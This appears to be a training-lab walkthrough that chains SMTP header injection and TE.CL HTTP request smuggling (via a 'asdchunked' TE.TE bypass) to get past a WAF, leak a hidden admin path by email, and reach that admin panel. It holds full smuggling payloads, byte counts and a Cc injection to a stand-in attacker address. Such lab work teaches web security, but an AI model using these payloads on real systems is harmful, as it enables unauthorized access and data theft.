Company: SentinelFrame Solutions
Setup:
- WAF deployed to block malicious requests
- Admin panel moved from
/adminto concealed path - Contact form for reaching system administrator
- Email testing account:
attacker@evil.htb(accessible at/mail)
Objective: Combine multiple HTTP attack techniques to bypass security controls and obtain sensitive information.
1. SMTP Header Injection → Discover hidden admin path
2. TE.CL via TE.TE → Bypass WAF blocking CRLF
3. Request Smuggling → Access hidden admin panel
- Navigate to website root
- Click Contact button
- Observe form fields: name, email, message
POST /contact HTTP/1.1
Host: <TARGET>
Content-Type: application/x-www-form-urlencoded
name=Test&email=test@gmail.com&message=HelloTry injecting CRLF to add Cc: header:
name=Test&email=test%40gmail.com%0d%0aCc:attacker@evil.htb&message=HelloWAF blocks requests containing CRLF characters (%0d%0a).
TE.CL via TE.TE using Substring match technique.
The WAF/proxy accepts Transfer-Encoding: asdchunked (substring contains "chunked").
Request 1 (Smuggling + SMTP Injection):
GET /404 HTTP/1.1
Host: <TARGET>
Content-Length: 4
Transfer-Encoding: asdchunked
f3
POST /contact HTTP/1.1
Host: <TARGET>
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
name=Test%0d%0aCc:+attacker@evil.htb%0d%0aDoesNotExist:+True&email=test@gmail.com&message=Hello+Admin
0
| Element | Purpose |
|---|---|
Transfer-Encoding: asdchunked |
Substring bypass (TE.TE) |
Content-Length: 4 |
For TE.CL (proxy uses TE, backend uses CL) |
f3 (hex) |
Chunk size = 243 bytes |
Cc: attacker@evil.htb |
SMTP header injection |
DoesNotExist: True |
Absorbs appended data |
0 |
Empty chunk terminator |
Count bytes from POST /contact... until before 0:
POST /contact HTTP/1.1\r\n
Host: <TARGET>\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 114\r\n
\r\n
name=Test%0d%0aCc:+attacker@evil.htb%0d%0aDoesNotExist:+True&email=test@gmail.com&message=Hello+Admin\r\n
\r\n
Total: 243 bytes = 0xf3
- Uncheck "Update Content-Length"
- Send request
http://<TARGET>/mail
From admin, revealing:
- Hidden admin panel path:
/ksu3nsj9c - WAF blocks external access to admin
Phase 5: Access Hidden Admin Panel
WAF blocks direct access to /ksu3nsj9c.
Use same TE.CL technique to smuggle request to admin panel.
Request 1 (Smuggling):
GET /404 HTTP/1.1
Host: <TARGET>
Content-Length: 4
Transfer-Encoding: asdchunked
38
GET /ksu3nsj9c HTTP/1.1
Host: <TARGET>
0
Request 2 (Trigger):
GET /404 HTTP/1.1
Host: <TARGET>GET /ksu3nsj9c HTTP/1.1\r\n = 26 bytes
Host: <TARGET>\r\n = ~20 bytes
\r\n = 2 bytes
──────────
~56 bytes = 0x38
- Uncheck "Update Content-Length" for Request 1
- Create Tab Group with both requests
- Set Send group in sequence (single connection)
- Send
| Request | Expected Response |
|---|---|
| Request 1 (GET /404) | 404 Not Found |
| Request 2 (GET /404) | Admin panel content! |
Request 2 receives the response to the smuggled /ksu3nsj9c request.
┌─────────────────────────────────────────────────────────────────┐
│ ATTACK CHAIN │
├─────────────────────────────────────────────────────────────────┤
│ │
│ 1. WAF blocks CRLF in direct requests │
│ ↓ │
│ 2. Use TE.TE (substring) to create TE.CL scenario │
│ ↓ │
│ 3. Smuggle SMTP Header Injection past WAF │
│ ↓ │
│ 4. Receive email copy → Learn hidden admin path │
│ ↓ │
│ 5. WAF blocks direct admin access │
│ ↓ │
│ 6. Smuggle GET request to hidden admin panel │
│ ↓ │
│ 7. Access admin content via second request's response │
│ │
└─────────────────────────────────────────────────────────────────┘
| Technique | Module Section |
|---|---|
| SMTP Header Injection | CRLF Injection |
| TE.TE Substring Match | HTTP Request Smuggling |
| TE.CL Request Smuggling | HTTP Request Smuggling |
| WAF Bypass | Request Smuggling Exploitation |
- Chain vulnerabilities - Single vuln might not work, combine them
- WAF bypass via smuggling - Hide payloads in request body
- TE.TE enables TE.CL - Obfuscation creates exploitable scenario
- Email as data channel - Use available functionality for recon
- Tab groups essential - Single connection required for smuggling